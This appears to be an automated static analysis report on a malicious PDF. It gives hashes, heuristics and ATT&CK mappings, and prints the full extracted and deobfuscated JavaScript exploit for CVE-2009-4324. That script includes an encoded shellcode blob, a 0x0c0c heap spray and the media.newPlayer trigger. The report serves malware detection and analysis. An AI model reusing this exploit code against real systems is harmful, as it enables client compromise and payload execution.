Malicious PDF — malware analysis report

Static analysis result for SHA-256 87e3b6ea6a973e89…

MALICIOUS

PDF

14.0 KB First seen: 2026-05-11
MD5: fb1bca30277f58ce9e9aa786fcecd96d SHA-1: 917125abfc45de6e1d0bba45b3d8157bd1da17ac SHA-256: 87e3b6ea6a973e89dbe63a7847d50d70144a6ef77c149c9e1dc6de609b55b020
260 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2009-4324 (media.newPlayer). The JavaScript is obfuscated using unescape() and String.fromCharCode() but was recovered and deobfuscated. The script's primary function is to download and execute a second-stage payload, indicated by the 'generic_stage_recovery' heuristic.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9966

Heuristics 8

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var shellcode = unescape("??9090??9090??9090??9090??EB90??5E1a??5B56??068a??303c??1674??E0c0??4604??268a??E480??020f??88c4??4303??EB46??E8e9??FFe1??FFff"+"??484e??4040??4040??4040??4040??4a46??4c40??4b4e??4045??4047??4347??4f4e??4643??4849??4e4f??4a48??4e40??4c4a??4840??4a4d??4647??4348??494b??454b??4847??4d4a??4b49??4d47??4f4d??4b4f??4749??4d4f??4f40??4a4e??4944??4a48??484e??4b4d??4a48??4342??494e??4641??4546??4a4f??4041??464e??4741??4f48??4b47??464f??4242??494b??4c47??4c4e??4749??4340??4c40??4 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0054_000.js pdf-javascript-stream PDF /JS object 54 at offset 0x2F75 7866 bytes
SHA-256: 547843b34547a980f401cc8198c3783cbdfe1522d57e377e071cfd1ce8c76453
Preview script
First 1,000 lines of the extracted script
�� / / - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 
 / / - - - - - - - - - - - - - - - - -N
��  ��   X M L  h �� - - - - - - - - - - - - - - - - - - - - 
 
 / / - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 
 
 
 / / < D o c u m e n t - L e v e l > 
 
 / / < A C R O _ s o u r c e > d m < / A C R O _ s o u r c e > 
 
 / / < A C R O _ s c r i p t > 
 
 / * * * * * * * * * * *  \^N��  D o c u m e n t - L e v e l : d m   * * * * * * * * * * * / 
 
 d m ( ) ; 
 
 f u n c t i o n   d m ( ) 
 
 { 
 
 v a r   s h e l l c o d e   =   u n e s c a p e ( " ? ? 9 0 9 0 ? ? 9 0 9 0 ? ? 9 0 9 0 ? ? 9 0 9 0 ? ? E B 9 0 ? ? 5 E 1 a ? ? 5 B 5 6 ? ? 0 6 8 a ? ? 3 0 3 c ? ? 1 6 7 4 ? ? E 0 c 0 ? ? 4 6 0 4 ? ? 2 6 8 a ? ? E 4 8 0 ? ? 0 2 0 f ? ? 8 8 c 4 ? ? 4 3 0 3 ? ? E B 4 6 ? ? E 8 e 9 ? ? F F e 1 ? ? F F f f " + " ? ? 4 8 4 e ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 a 4 6 ? ? 4 c 4 0 ? ? 4 b 4 e ? ? 4 0 4 5 ? ? 4 0 4 7 ? ? 4 3 4 7 ? ? 4 f 4 e ? ? 4 6 4 3 ? ? 4 8 4 9 ? ? 4 e 4 f ? ? 4 a 4 8 ? ? 4 e 4 0 ? ? 4 c 4 a ? ? 4 8 4 0 ? ? 4 a 4 d ? ? 4 6 4 7 ? ? 4 3 4 8 ? ? 4 9 4 b ? ? 4 5 4 b ? ? 4 8 4 7 ? ? 4 d 4 a ? ? 4 b 4 9 ? ? 4 d 4 7 ? ? 4 f 4 d ? ? 4 b 4 f ? ? 4 7 4 9 ? ? 4 d 4 f ? ? 4 f 4 0 ? ? 4 a 4 e ? ? 4 9 4 4 ? ? 4 a 4 8 ? ? 4 8 4 e ? ? 4 b 4 d ? ? 4 a 4 8 ? ? 4 3 4 2 ? ? 4 9 4 e ? ? 4 6 4 1 ? ? 4 5 4 6 ? ? 4 a 4 f ? ? 4 0 4 1 ? ? 4 6 4 e ? ? 4 7 4 1 ? ? 4 f 4 8 ? ? 4 b 4 7 ? ? 4 6 4 f ? ? 4 2 4 2 ? ? 4 9 4 b ? ? 4 c 4 7 ? ? 4 c 4 e ? ? 4 7 4 9 ? ? 4 3 4 0 ? ? 4 c 4 0 ? ? 4 3 4 6 ? ? 4 d 4 6 ? ? 4 4 4 6 ? ? 4 0 4 2 ? ? 4 f 4 2 ? ? 4 3 4 6 ? ? 4 0 4 2 ? ? 4 3 4 4 ? ? 4 a 4 3 ? ? 4 c 4 5 ? ? 4 1 4 4 ? ? 4 3 4 6 ? ? 4 2 4 7 ? ? 4 f 4 6 ? ? 4 2 4 6 ? ? 4 1 4 6 ? ? 4 4 4 7 ? ? 4 e 4 2 ? ? 4 5 4 6 ? ? 4 8 4 7 ? ? 4 5 4 6 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 9 4 5 ? ? 4 f 4 5 ? ? 4 f 4 a ? ? 4 7 4 6 ? ? 4 4 4 6 ? ? 4 1 4 a ? ? 4 0 4 3 ? ? 4 0 4 0 ? ? 4 b 4 8 ? ? 4 0 4 4 ? ? 4 c 4 0 ? ? 4 b 4 8 ? ? 4 0 4 7 ? ? 4 c 4 1 ? ? 4 d 4 a ? ? 4 b 4 8 ? ? 4 8 4 6 ? ? 4 8 4 0 ? ? 4 1 4 5 ? ? 4 b 4 8 ? ? 4 5 4 7 ? ? 4 c 4 3 ? ? 4 b 4 8 ? ? 4 4 4 7 ? ? 4 e 4 2 ? ? 4 8 4 7 ? ? 4 3 4 0 ? ? 4 5 4 f ? ? 4 6 4 5 ? ? 4 b 4 8 ? ? 4 6 4 7 ? ? 4 0 4 2 ? ? 4 3 4 0 ? ? 4 5 4 f ? ? 4 3 4 3 ? ? 4 9 4 c ? ? 4 9 4 4 ? ? 4 1 4 4 ? ? 4 d 4 a ? ? 4 3 4 0 ? ? 4 5 4 c ? ? 4 3 4 3 ? ? 4 b 4 d ? ? 4 f 4 0 ? ? 4 e 4 b ? ? 4 0 4 1 ? ? 4 8 4 3 ? ? 4 2 4 f ? ? 4 4 4 7 ? ? 4 8 4 0 ? ? 4 1 4 c ? ? 4 b 4 c ? ? 4 d 4 0 ? ? 4 3 4 0 ? ? 4 a 4 d ? ? 4 0 4 4 ? ? 4 b 4 e ? ? 4 1 4 f ? ? 4 b 4 3 ? ? 4 f 4 1 ? ? 4 5 4 7 ? ? 4 7 4 e ? ? 4 e 4 5 ? ? 4 b 4 8 ? ? 4 e 4 5 ? ? 4 4 4 2 ? ? 4 3 4 0 ? ? 4 d 4 d ? ? 4 6 4 6 ? ? 4 b 4 8 ? ? 4 c 4 0 ? ? 4 b 4 4 ? ? 4 b 4 8 ? ? 4 e 4 5 ? ? 4 c 4 1 ? ? 4 3 4 0 ? ? 4 d 4 d ? ? 4 b 4 8 ? ? 4 4 4 0 ? ? 4 b 4 8 ? ? 4 3 4 0 ? ? 4 5 4 c ? ? 4 b 4 a ? ? 4 9 4 5 ? ? 4 2 4 e ? ? 4 c 4 b ? ? 4 3 4 8 ? ? 4 f 4 e ? ? 4 8 4 3 ? ? 4 3 4 3 ? ? 4 6 4 f ? ? 4 6 4 4 ? ? 4 d 4 8 ? ? 4 7 4 4 ? ? 4 0 4 6 ? ? 4 0 4 5 ? ? 4 6 4 5 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 8 4 1 ? ? 4 3 4 8 ? ? 4 8 4 f ? ? 4 f 4 f ? ? 4 4 4 7 ? ? 4 2 4 f ? ? 4 d 4 3 ? ? 4 0 4 0 ? ? 4 0 4 1 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 6 4 7 ? ? 4 b 4 e ? ? 4 9 4 8 ? ? 4 7 4 4 ? ? 4 4 4 0 ? ? 4 9 4 8 ? ? 4 7 4 7 ? ? 4 0 4 6 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 4 4 0 ? ? 4 a 4 6 ? ? 4 0 4 4 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 4 4 3 ? ? 4 9 4 8 ? ? 4 7 4 4 ? ? 4 c 4 5 ? ? 4 a 4 6 ? ? 4 0 4 0 ? ? 4 a 4 6 ? ? 4 0 4 0 ? ? 4 a 4 6 ? ? 4 0 4 0 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 0 4 6 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 0 4 1 ? ? 4 3 4 8 ? ? 4 8 4 f ? ? 4 f 4 f ? ? 4 4 4 7 ? ? 4 b 4 4 ? ? 4 a 4 6 ? ? 4 0 4 0 ? ? 4 d 4 8 ? ? 4 f 4 5 ? ? 4 0 4 7 ? ? 4 3 4 5 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 4 4 0 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 c 4 5 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 0 4 6 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 8 4 2 ? ? 4 b 4 8 ? ? 4 f 4 4 ? ? 4 0 4 7 ? ? 4 3 4 8 ? ? 4 9 4 e ? ? 4 a 4 0 ? ? 4 b 4 8 ? ? 4 7 4 4 ? ? 4 c 4 5 ? ? 4 0 4 4 ? ? 4 1 4 8 ? ? 4 8 4 3 ? ? 4 6 4 4 ? ? 4 6 4 5 ? ? 4 3 4 4 ? ? 4 b 4 4 ? ? 4 5 4 7 ? ? 4 9 4 0 ? ? 4 1 4 8 ? ? 4 8 4 7 ? ? 4 4 4 0 ? ? 4 4 4 0 ? ? 4 6 4 0 ? ? 4 9 4 8 ? ? 4 9 4 1 ? ? 4 4 4 7 ? ? 4 4 4 0 ? ? 4 2 4 e ? ? 4 c 4 e ? ? 4 b 4 e ? ? 4 a 4 1 ? ? 4 3 4 8 ? ? 4 0 4 c ? ? 4 8 4 0 ? ? 4 9 4 8 ? ? 4 7 4 4 ? ? 4 4 4 7 ? ? 4 0 4 4 ? ? 4 1 4 8 ? ? 4 8 4 3 ? ? 4 b 4 4 ? ? 4 1 4 6 ? ? 4 b 4 4 ? ? 4 1 4 6 ? ? 4 5 4 7 ? ? 4 9 4 0 ? ? 4 1 4 8 ? ? 4 8 4 7 ? ? 4 4 4 0 ? ? 4 6 4 0 ? ? 4 1 4 1 ? ? 4 1 4 8 ? ? 4 9 4 1 ? ? 4 4 4 7 ? ? 4 e 4 0 ? ? 4 2 4 e ? ? 4 c 4 e ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 c 4 5 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 0 4 3 ? ? 4 f 4 0 ? ? 4 5 4 8 ? ? 4 2 4 7 ? ? 4 f 4 f ? ? 4 f 4 f ? ? 4 f 4 f ? ? 4 9 4 8 ? ? 4 7 4 4 ? ? 4 8 4 7 ? ? 4 a 4 6 ? ? 4 2 4 0 ? ? 4 d 4 8 ? ? 4 7 4 7 ? ? 4 f 4 3 ? ? 4 6 4 5 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 0 4 2 ? ? 4 9 4 8 ? ? 4 7 4 0 ? ? 4 b 4 8 ? ? 4 f 4 5 ? ? 4 8 4 7 ? ? 4 b 4 2 ? ? 4 f 4 5 ? ? 4 4 4 7 ? ? 4 b 4 8 ? ? 4 7 4 4 ? ? 4 4 4 7 ? ? 4 0 4 3 ? ? 4 8 4 1 ? ? 4 b 4 4 ? ? 4 0 4 4 ? ? 4 3 4 8 ? ? 4 b 4 f ? ? 4 0 4 0 ? ? 4 5 4 7 ? ? 4 7 4 f ? ? 4 b 4 8 ? ? 4 7 4 4 ? ? 4 8 4 7 ? ? 4 b 4 2 ? ? 4 7 4 4 ? ? 4 4 4 7 ? ? 4 0 4 5 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 4 4 7 ? ? 4 f 4 f ? ? 4 7 4 3 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 4 4 2 ? ? 4 f 4 f ? ? 4 7 4 3 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 c 4 1 ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 8 4 0 ? ? 4 0 4 5 ? ? 4 b 4 8 ? ? 4 6 4 d ? ? 4 a 4 8 ? ? 4 2 4 0 ? ? 4 2 4 4 ? ? 4 a 4 0 ? ? 4 0 4 c ? ? 4 4 4 7 ? ? 4 2 4 0 ? ? 4 b 4 e ? ? 4 7 4 f ? ? 4 6 4 c ? ? 4 2 4 4 ? ? 4 f 4 f ? ? 4 0 4 2 ? ? 4 9 4 5 ? ? 4 a 4 8 ? ? 4 1 4 0 ? ? 4 a 4 0 ? ? 4 0 4 c ? ? 4 4 4 7 ? ? 4 6 4 0 ? ? 4 8 4 8 ? ? 4 2 4 0 ? ? 4 2 4 4 ? ? 4 1 4 4 ? ? 4 b 4 e ? ? 4 4 4 f ? ? 4 8 4 8 ? ? 4 2 4 0 ? ? 4 3 4 8 ? ? 4 e 4 e ? ? 4 7 4 0 ? ? 4 8 4 e ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 0 4 0 ? ? 4 3 4 8 ? ? 4 4 4 0 ? ? 4 4 4 2 ? ? 4 d 4 0 ? ? 4 a 4 6 ? ? 4 0 4 0 ? ? 4 6 4 5 ? ? 4 f 4 f ? ? 4 7 4 7 ? ? 4 c 4 2 ? ? 4 f 4 f ? ? 4 7 4 6 ? ? 4 c 4 0 ? ? 4 a 4 6 ? ? 4 0 4 0 ? ? 4 a 4 6 ? ? 4 f 4 f ? ? 4 f 4 f ? ? 4 7 4 5 ? ? 4 4 4 1 ? ? 3 0 3 0 " ) ; 
 
 r e   =   / \ ? \ ? / g ; 
 
 s h e l l c o d e   =   s h e l l c o d e . r e p l a c e ( r e ,   " % u " ) ; 
 
 s h e l l c o d e   =   u n e s c a p e ( s h e l l c o d e ) ; 
 
 b i g b l o c k   =   u n e s c a p e ( " % u 0 c 0 c % u 0 c 0 c " ) ; 
 
 h e a d e r s i z e   =   2 0 ; 
 
 s l a c k s p a c e   =   h e a d e r s i z e + s h e l l c o d e . l e n g t h ; 
 
 w h i l e   ( b i g b l o c k . l e n g t h < s l a c k s p a c e )   b i g b l o c k + = b i g b l o c k ; 
 
 f i l l b l o c k   =   b i g b l o c k . s u b s t r i n g ( 0 ,   s l a c k s p a c e ) ; 
 
 b l o c k   =   b i g b l o c k . s u b s t r i n g ( 0 ,   b i g b l o c k . l e n g t h - s l a c k s p a c e ) ; 
 
 w h i l e ( b l o c k . l e n g t h + s l a c k s p a c e < = 0 x 4 0 0 0 0 )   b l o c k   =   b l o c k + b l o c k + f i l l b l o c k ; 
 
 m e m o r y   =   n e w   A r r a y ( ) ;   f o r   ( i = 0 ; i < 2 0 0 ; i + + )   m e m o r y [ i ]   =   b l o c k   +   s h e l l c o d e ; 
 
 t r y   { t h i s . m e d i a . n e w P l a y e r ( n u l l ) ; }   c a t c h ( e )   { } 
 
 u t i l . p r i n t d ( S t r i n g . f r o m C h a r C o d e ( 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 , 2 5 7 0 ) ,   n e w   D a t e ( ) ) ; 
 
 } 
 
 
 
 / / < / A C R O _ s c r i p t > 
 
 / / < / D o c u m e n t - L e v e l >
stream_014_off00002f75.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x2F75 3950 bytes
SHA-256: 0aa0245fc9510d5f24ddfc1a18c7ed488a28278fc4312c20359cf09f51a766dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
generic_stage_recovery_000.js deobfuscated-js generic stage recovery null-collapse from JavaScript object 54 at offset 0x2F75 3943 bytes
SHA-256: 773c16ad426b1f1c071ab756ea57c02092f97472dc0e430fe05f9cc0f113716f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
��//-------------------------------------------------------------
//-----------------N
��  �� XML h ��--------------------
//-------------------------------------------------------------

//<Document-Level>
//<ACRO_source>dm</ACRO_source>
//<ACRO_script>
/*********** \^N�� Document-Level:dm ***********/
dm();
function dm()
{
var shellcode = unescape("??9090??9090??9090??9090??EB90??5E1a??5B56??068a??303c??1674??E0c0??4604??268a??E480??020f??88c4??4303??EB46??E8e9??FFe1??FFff"+"??484e??4040??4040??4040??4040??4a46??4c40??4b4e??4045??4047??4347??4f4e??4643??4849??4e4f??4a48??4e40??4c4a??4840??4a4d??4647??4348??494b??454b??4847??4d4a??4b49??4d47??4f4d??4b4f??4749??4d4f??4f40??4a4e??4944??4a48??484e??4b4d??4a48??4342??494e??4641??4546??4a4f??4041??464e??4741??4f48??4b47??464f??4242??494b??4c47??4c4e??4749??4340??4c40??4346??4d46??4446??4042??4f42??4346??4042??4344??4a43??4c45??4144??4346??4247??4f46??4246??4146??4447??4e42??4546??4847??4546??4040??4040??4040??4040??4040??4040??4040??4040??4040??4040??4040??4945??4f45??4f4a??4746??4446??414a??4043??4040??4b48??4044??4c40??4b48??4047??4c41??4d4a??4b48??4846??4840??4145??4b48??4547??4c43??4b48??4447??4e42??4847??4340??454f??4645??4b48??4647??4042??4340??454f??4343??494c??4944??4144??4d4a??4340??454c??4343??4b4d??4f40??4e4b??4041??4843??424f??4447??4840??414c??4b4c??4d40??4340??4a4d??4044??4b4e??414f??4b43??4f41??4547??474e??4e45??4b48??4e45??4442??4340??4d4d??4646??4b48??4c40??4b44??4b48??4e45??4c41??4340??4d4d??4b48??4440??4b48??4340??454c??4b4a??4945??424e??4c4b??4348??4f4e??4843??4343??464f??4644??4d48??4744??4046??4045??4645??4f4f??4745??4841??4348??484f??4f4f??4447??424f??4d43??4040??4041??4040??4040??4647??4b4e??4948??4744??4440??4948??4747??4046??4f4f??4747??4440??4a46??4044??4f4f??4745??4443??4948??4744??4c45??4a46??4040??4a46??4040??4a46??4040??4f4f??4747??4046??4f4f??4745??4041??4348??484f??4f4f??4447??4b44??4a46??4040??4d48??4f45??4047??4345??4f4f??4747??4440??4f4f??4747??4c45??4f4f??4747??4046??4f4f??4745??4842??4b48??4f44??4047??4348??494e??4a40??4b48??4744??4c45??4044??4148??4843??4644??4645??4344??4b44??4547??4940??4148??4847??4440??4440??4640??4948??4941??4447??4440??424e??4c4e??4b4e??4a41??4348??404c??4840??4948??4744??4447??4044??4148??4843??4b44??4146??4b44??4146??4547??4940??4148??4847??4440??4640??4141??4148??4941??4447??4e40??424e??4c4e??4f4f??4747??4c45??4f4f??4745??4043??4f40??4548??4247??4f4f??4f4f??4f4f??4948??4744??4847??4a46??4240??4d48??4747??4f43??4645??4f4f??4745??4042??4948??4740??4b48??4f45??4847??4b42??4f45??4447??4b48??4744??4447??4043??4841??4b44??4044??4348??4b4f??4040??4547??474f??4b48??4744??4847??4b42??4744??4447??4045??4f4f??4747??4447??4f4f??4743??4f4f??4745??4442??4f4f??4743??4f4f??4745??4c41??4f4f??4745??4840??4045??4b48??464d??4a48??4240??4244??4a40??404c??4447??4240??4b4e??474f??464c??4244??4f4f??4042??4945??4a48??4140??4a40??404c??4447??4640??4848??4240??4244??4144??4b4e??444f??4848??4240??4348??4e4e??4740??484e??4040??4040??4040??4040??4348??4440??4442??4d40??4a46??4040??4645??4f4f??4747??4c42??4f4f??4746??4c40??4a46??4040??4a46??4f4f??4f4f??4745??4441??3030");
re = /\?\?/g;
shellcode = shellcode.replace(re, "%u");
shellcode = unescape(shellcode);
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}

//</ACRO_script>
//</Document-Level>

Open this report in the interactive analyzer, or submit your own file for analysis.